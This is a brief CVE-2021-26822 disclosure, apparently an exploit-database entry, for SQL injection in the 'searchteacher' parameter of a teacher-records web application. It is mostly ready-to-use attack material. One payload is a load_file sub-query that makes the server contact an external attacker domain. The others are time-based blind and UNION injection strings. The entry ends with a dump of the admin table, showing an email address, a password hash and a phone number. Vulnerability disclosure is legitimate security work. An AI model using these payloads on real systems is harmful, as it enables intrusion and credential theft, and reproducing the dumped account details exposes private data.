CVE-2021-26822
Vendor Software
Description
The searchteacher parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\g1ivok7s826weh3qbkb5z839f0lt9k48vbj36tui.nu11secur1tyattack.net\bqd'))+' was submitted in the searchteacher parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed.
Paylod
---
Parameter: searchteacher (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: searchteacher=470114'+(select load_file('\\\\g1ivok7s826weh3qbkb5z839f0lt9k48vbj36tui.nu11secur1tyattack.net\\bqd'))+'' AND (SELECT 5113 FROM (SELECT(SLEEP(5)))KIjD) AND 'VevZ'='VevZ&search=%C2%9E%C3%A9e
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: searchteacher=470114'+(select load_file('\\\\g1ivok7s826weh3qbkb5z839f0lt9k48vbj36tui.nu11secur1tyattack.net\\bqd'))+'' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7170707171,0x464270665473516670554b446c745478524849484b654b554b52594859554643445044594f587455,0x7170626b71),NULL,NULL,NULL-- -&search=%C2%9E%C3%A9e
---After the exploit
Database: trms
Table: tbladmin
[1 entry]
+----+---------------------+----------------------------------+----------+-----------+---------------------+--------------+
| ID | Email | Password | UserName | AdminName | AdminRegdate | MobileNumber |
+----+---------------------+----------------------------------+----------+-----------+---------------------+--------------+
| 1 | adminuser@gmail.com | f925916e2754e5e03f75dd58a5733251 | admin | Admin | 2019-10-04 09:10:04 | 8979555556 |
+----+---------------------+----------------------------------+----------+-----------+---------------------+--------------+